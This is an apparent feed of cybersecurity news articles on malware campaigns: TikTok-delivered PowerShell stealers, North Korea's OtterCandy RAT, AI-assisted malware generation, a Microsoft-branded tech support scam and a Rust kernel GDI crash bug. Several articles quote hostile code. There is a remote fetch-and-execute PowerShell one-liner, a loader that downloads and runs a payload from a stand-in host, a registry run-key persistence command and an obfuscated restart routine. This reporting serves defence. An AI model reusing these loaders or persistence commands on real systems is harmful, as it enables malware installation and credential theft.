• Cybercriminals are exploiting TikTok’s massive user base to distribute sophisticated malware campaigns that promise free software activation but deliver dangerous payloads instead.

    The attack leverages social engineering tactics reminiscent of the ClickFix technique, where unsuspecting users are tricked into executing malicious PowerShell commands on their systems.

    Victims encounter TikTok videos offering free activation of popular software like Photoshop, with one such video accumulating over 500 likes before detection.

    The attack chain begins when users follow instructions to open PowerShell with administrator privileges and execute a deceptively simple one-liner command.

    The initial infection vector instructs victims to run the command iex (irm slmgr[.]win/photoshop), which fetches and executes malicious PowerShell code from a remote server.

    This first-stage payload (SHA256: 6D897B5661AA438A96AC8695C54B7C4F3A1FBF1B628C8D2011E50864860C6B23) achieved a VirusTotal detection rate of 17/63, demonstrating its evasive capabilities.

    The script downloads a secondary executable called updater.exe from hxxps://file-epq[.]pages[.]dev/updater.exe, which analysis revealed as AuroStealer malware designed to harvest sensitive credentials and system information.

    Fake TikTok video (Source – Internet Storm Center)

    Internet Storm Center researchers identified the campaign and discovered that persistence mechanisms are implemented through scheduled tasks disguised as legitimate system processes.

    The malware randomly selects task names such as “MicrosoftEdgeUpdateTaskMachineCore” to blend in with genuine Windows services, ensuring execution at every user logon.

    A third payload named source.exe (SHA256: db57e4a73d3cb90b53a0b1401cb47c41c1d6704a26983248897edcc13a367011) introduces an advanced evasion technique by compiling C# code on-demand during runtime using the .NET Framework compiler located at C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe.

    Self-Compiling Technique and Memory Injection

    The self-compiling capability represents a sophisticated approach to evade traditional detection mechanisms.

    The malware compiles a C# class during execution that imports kernel32.dll functions including VirtualAlloc, CreateThread, and WaitForSingleObject.

    This dynamically compiled code allocates executable memory space, injects shellcode directly into the process memory, and creates a new thread to execute the malicious payload without writing additional files to disk.

    Researchers discovered multiple variations of this campaign across TikTok targeting users searching for cracked versions of various software applications, highlighting the importance of avoiding untrusted sources for software downloads.

    Follow us on Google NewsLinkedIn, and X to Get More Instant UpdatesSet CSN as a Preferred Source in Google.

    The post Hackers Using TikTok Videos to Deploy Self-Compiling Malware That Leverages PowerShell for Execution appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Cybercriminals associated with the North Korean threat group WaterPlum, also known as Famous Chollima or PurpleBravo, have escalated their activities with a sophisticated new malware strain called OtterCandy.

    This cross-platform RAT and information stealer represents a dangerous evolution in the group’s capabilities, combining features from previously observed malware families RATatouille and OtterCookie to create a more potent weapon for credential theft and system compromise.

    The malware emerges as part of WaterPlum’s ClickFake Interview campaign, a deceptive social engineering operation that masquerades as legitimate job recruitment processes in the blockchain and cryptocurrency sectors.

    Attackers create convincing fake company websites, such as BlockForgeX, which present seemingly authentic job applications and interview processes to lure unsuspecting victims into downloading malicious software under the guise of camera setup instructions or driver updates.

    ClickFake attack flow (Source – NTT Security)

    NTT Security researchers identified OtterCandy as the latest addition to WaterPlum’s arsenal, noting its deployment across Windows, macOS, and Linux platforms since July 2025.

    The malware’s impact extends beyond individual systems, as attacks have been observed targeting victims in Japan and other regions, demonstrating the threat group’s expanding global reach and ambitions.

    Built using Node.js, OtterCandy establishes communication with command-and-control servers through Socket.IO connections, enabling threat actors to execute a comprehensive range of malicious activities remotely.

    The malware’s command structure reveals its sophisticated design, implementing functions such as ‘imp’ for sweeping home directories, ‘pat’ for pattern-based file searches, and ‘upload’ for extracting system information, browser credentials, and cryptocurrency wallet data.

    Advanced Persistence and Evasion Mechanisms

    OtterCandy demonstrates remarkable resilience through its multi-layered persistence strategy that ensures continued operation even after detection attempts.

    ClickFix webpage (Source – NTT Security)

    While the malware typically relies on the preceding DiggingBeaver component for initial persistence, it incorporates an independent backup mechanism that automatically restarts processes when interrupted.

    This self-preservation feature utilizes JavaScript’s process event handling to monitor for SIGINT signals:-

    function startChildProcess() {
        const_0x4777b5 = fork(path['join') (_dirname, 'decode.js'), [], {
            'detached': !![],
            'stdio': 'ignore'
        });
        _0x4777b5['unref']();
    }
    
    process['on']('SIGINT', () => {
        startChildProcess();
        process['exit']();
    });

    The malware’s August 2025 update introduced enhanced anti-forensic capabilities, including comprehensive trace deletion functions that remove registry entries, downloaded files, and temporary directories.

    This cleanup mechanism operates through the ‘ss_del’ command, systematically erasing evidence of compromise while maintaining operational security for the threat actors’ ongoing campaigns.

    Follow us on Google NewsLinkedIn, and X to Get More Instant UpdatesSet CSN as a Preferred Source in Google.

    The post Threat Actors Leveraging ClickFake Interview Attack to Deploy OtterCandy Malware appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Security teams around the world are grappling with a new breed of cyber threats that leverage advanced automation to identify software weaknesses and craft malicious payloads at unprecedented speed.

    Over the past year, adversaries have integrated machine-driven workflows into their operations, enabling opportunistic criminals and well-funded groups alike to discover zero-days and assemble malware with minimal human intervention.

    This evolution markedly lowers the barrier to entry for sophisticated attacks, extending capabilities once limited to nation-state actors to any motivated cybercriminal.

    The Microsoft Digital Defense Report highlights that attackers are no longer manually hunting for exploitable bugs through tedious code reviews or mass scanning.

    Instead, they are training large-scale models on publicly available code repositories, then directing the models to generate proof-of-concept exploits for specific targets.

    In parallel, the same automated pipelines transform these exploits into fully featured malware families by appending obfuscation layers, custom command-and-control routines, and persistence modules.

    Microsoft analysts noted that this end-to-end automation has reduced vulnerability turnaround time from weeks to mere hours, dramatically compressing the time Windows defenders have to patch critical systems.

    As organizations reflect on this shifting landscape, it becomes clear that traditional signature-based defenses offer diminishing returns.

    Real-time threat hunting and behavior-based detection must evolve to counter automatically generated threats.

    Microsoft researchers identified numerous incidents where bespoke malware variants—indistinguishable by signature from benign test code—evaded antivirus engines and sandbox environments, silently establishing footholds in enterprise networks.

    Most targeted sectors (Source – Microsoft)

    Security operations centers (SOCs) now face the dual challenge of high-velocity attack generation and increasingly evasive payloads.

    Understanding the infection mechanism

    A closer look at the automated infection chain reveals how attackers leverage scripting and orchestration frameworks to deliver and activate malicious code.

    Initially, the adversary’s AI model generates an exploit targeting a specific library or application component—such as a deserialization flaw in a widely deployed web framework.

    The model then crafts a loader script in PowerShell or Python that dynamically fetches the payload:-

    $url = "https://malicious.example.com/payload.bin"
    $bytes = (New-Object Net.WebClient).DownloadData($url)
    [System.Reflection.Assembly]::Load($bytes).EntryPoint.Invoke($null, @())

    This loader script is injected into harmless-looking documents or served via spear-phishing emails, evading static defenses.

    Once executed, the loader decrypts and launches the generated malware in memory, bypassing disk-based detection.

    To maintain persistence, the automation pipeline appends code that registers a scheduled task or implants a fallback registry run key:-

    New-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" `
      -Name "SysUpdate" -Value "powershell -ExecutionPolicy Bypass -File %UserProfile%\update.ps1"

    Microsoft analysts identified that many such scripts leverage randomized names and variable assignments, ensuring each campaign appears unique and further confounding detection logic.

    This fusion of automated vulnerability discovery and instantaneous malware generation marks a turning point in cyber offense.

    Defenders must prioritize continuous monitoring of anomalous behaviors, implement stringent application allow-listing, and adopt rapid patch orchestration to mitigate emerging threats before they can be weaponized.

    Follow us on Google NewsLinkedIn, and X to Get More Instant UpdatesSet CSN as a Preferred Source in Google.

    The post Hackers Using AI to Automate Vulnerability Discovery and Malware Generation – Microsoft Report appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Cybercriminals have discovered a gap in Zendesk’s ticket submission process and are using it to bombard victims with waves of misleading support messages. When configured to accept anonymous requests, however, the service can be abused to generate email floods that appear to come from legitimate corporate domains. Earlier this week, security blogger Brian Krebs was […]

    The post Attackers Exploit Zendesk Authentication Issue to Flood Targets’ Inboxes with Corporate Notifications appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • The North Korean threat actor linked to the Contagious Interview campaign has been observed merging some of the functionality of two of its malware programs, indicating that the hacking group is actively refining its toolset. That’s according to new findings from Cisco Talos, which said recent campaigns undertaken by the hacking group have seen the functions of BeaverTail and OtterCookie coming

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • A critical security vulnerability has been discovered in WatchGuard Firebox appliances that could allow remote attackers to execute arbitrary code without authentication. The flaw, identified as CVE-2025-9242, affects the IKEv2 VPN service and has been assigned a severity score of 9.3 under CVSS 4.0, marking it as a critical threat to organizations using these security […]

    The post WatchGuard VPN Flaw Allows Remote Attackers to Execute Arbitrary Code appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Attackers are exploiting TikTok’s massive reach to trick users into executing malware through seemingly innocuous videos. In one popular TikTok video (liked over 500 times), the attacker poses as a provider of a free Photoshop activation tool and urges viewers to open PowerShell as an administrator and run: powershelliex (irm slmgr.win/photoshop) This command uses Invoke-Expression […]

    The post TikTok Videos Weaponized to Deliver Self-Compiling PowerShell Malware appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • A new campaign has emerged that weaponizes Microsoft’s familiar branding to lure unsuspecting users into a sophisticated tech support scam.

    Victims receive a seemingly legitimate email, complete with Microsoft’s official logo, claiming there is an important financial transaction or security alert requiring immediate attention.

    The message prompts recipients to click a link under the guise of confirming identity or resolving an urgent issue.

    Cofense analysts noted that the threat actors have refined their social engineering tactics by combining payment lures with deceptive UI overlays to maximize impact.

    Upon clicking the link, users are redirected through a faux CAPTCHA challenge designed to mimic a trusted verification process.

    Redirect Page (Source -Cofense)

    When the victim completes the verification, they are led to a landing page where the browser appears locked by multiple pop-up windows styled after genuine Microsoft security alerts.

    Email Body (Source -Cofense)

    The attacker’s goal is to create a sense of panic, convincing the user that their system has been compromised beyond normal functionality.

    In many cases, the scam culminates in a displayed support phone number claiming to be Microsoft’s helpline.

    When the victim dials, they connect to a malicious actor posing as a support technician.

    Under the pretext of resolving the infection, the scammer persuades the target to divulge their Microsoft account credentials or install a remote desktop tool to “repair” the system, thereby granting full access to the attacker’s infrastructure.

    Infection Mechanism

    The infection begins with a list of observed URLs that serve as redirectors and payload hosts. The initial redirector domains include:

    hxxps://alphadogprinting.com/index.php?8jl9lz
    hxxps://amormc.com/index.php?ndv5f1

    These URLs funnel victims through a CAPTCHA page before landing on the malicious overlay server. The payload domains, such as:

    hxxps://my.toruftuiov.com/9397b37a-50c4-48c0-899d-f5e87a24088d
    hxxps://deprivy.stified.sbs/proc.php

    host the scripted overlays that manipulate the DOM to disable mouse control and display counterfeit alerts.

    The browser lock is purely illusory and can be dismissed by pressing the ESC key, but few victims discover this before contacting the attacker.

    By blending trusted logos with multiple redirect stages and UI deception, this campaign exemplifies an evolving threat that leverages brand familiarity to facilitate credential theft.

    Follow us on Google NewsLinkedIn, and X to Get More Instant UpdatesSet CSN as a Preferred Source in Google.

    The post New Tech Support Scam with Microsoft’s Logo Tricks Users to Steal Login Credentials appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • A North Korean-linked group, WaterPlum’s Cluster B, has evolved its tactics by introducing OtterCandy—a Node.js–based RAT and information stealer—through the ClickFake Interview campaign, with significant enhancements observed in August 2025. This threat actor, attributed to North Korea, orchestrated two primary campaigns: Contagious Interview and ClickFake Interview. Although multiple clusters operate under the WaterPlum umbrella, Cluster […]

    The post ClickFake Interview Campaign Used by Threat Actors to Deliver OtterCandy Malware appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • A vulnerability in Microsoft’s newly implemented Rust-based kernel component for the Graphics Device Interface (GDI) in Windows.

    This flaw, which could trigger a system-wide crash via a Blue Screen of Death (BSOD), highlights the challenges of integrating memory-safe languages into critical OS components.

    Although Microsoft classified it as moderate severity, the issue underscores potential risks in enterprise environments where attackers might weaponize it for widespread disruption.

    The vulnerability emerged during a targeted fuzzing campaign by Check Point, aimed at probing Windows’ graphics subsystem for weaknesses. Fuzzing, a technique that bombards software with malformed inputs to expose bugs, proved instrumental here.

    Using tools like WinAFL and WinAFL Pet on a controlled test setup, researchers focused on the Enhanced Metafile Format (EMF) and EMF+ files’ compact structures that instruct GDI on rendering 2D graphics.

    These files, often embedded in documents or images, have long been a vector for exploits due to their complexity.

    Starting with just 16 seed files, the fuzzers quickly unearthed crashes ranging from information leaks to code execution risks in user-space components.

    But the real breakthrough came unexpectedly: repeated system restarts after BugChecks pointed to a kernel-level issue. Dubbed a “Denial of Fuzzing” condition, it halted testing and forced a pivot to kernel forensics.

    Windows Rust-based Kernel GDI Vulnerability

    To isolate the culprit, Check Point enhanced its setup with memory dump analysis using MemProcFS and Volatility, extracting mutated files from RAM disks.

    They refined the corpus iteratively, shrinking reproduction time from days to 30 minutes across 836 samples.

    A clever harness modification streamed mutations to a remote server via a custom C function and Python listener, capturing the precise 380,000th mutation that triggered the crash.

    Deep analysis revealed the bug in win32kbase_rs.sys, Microsoft’s Rust-rewritten driver for GDI regions.

    During path-to-region conversion in NtGdiSelectClipPath, an out-of-bounds array access in region_from_path_mut() invoked Rust’s panic_bounds_check(), causing a SYSTEM_SERVICE_EXCEPTION.

    Service Exception
    Service Exception

    The trigger? A malformed EmfPlusDrawBeziers record with mismatched point counts (17 points declared as 4) and anomalous coordinates, combined with a wide-stroke pen from an EmfPlusObject.

    This malformed geometry stressed edge block handling, bypassing bounds in the singly linked list representation.

    A simple PowerShell proof-of-concept demonstrated the exploit’s accessibility: embedding the crafted metafile in a Graphics object via System.Drawing led to an instant BSOD, even from low-privilege sessions on x86/x64 Windows 11 24H2.

    While not enabling remote code execution directly, it posed a potent denial-of-service threat imagine an insider scripting crashes across an enterprise on a Friday evening.

    Microsoft patched the flaw in OS Build 26100.4202 via the KB5058499 preview on May 28, 2025, expanding the driver by 16KB with hardened logic.

    Key changes included dual edge-handling routines add_edge_original() and a bounds-checked add_edge_new(), gated by a feature flag. Full rollout followed in June, though initial testing showed the flag disabled.

    Check Point reported the issue promptly, but Microsoft’s MSRC deemed it a non-critical DoS, arguing Rust’s panic mechanism behaved as designed.

    This marks one of the first public Rust kernel bugs post-integration, as touted at BlueHat IL 2023 for enhancing security. While Rust mitigates overflows, it doesn’t eliminate design flaws or incomplete testing.

    As Windows leans into memory safety, such incidents remind developers: language alone isn’t a panacea. Thorough fuzzing and validation remain vital to prevent “alarm systems that blow up the house.”

    Follow us on Google News, LinkedIn, and X for daily cybersecurity updates. Contact us to feature your stories.

    The post Windows Rust-based Kernel GDI Vulnerability Leads to Crash and Blue Screen of Death Error appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶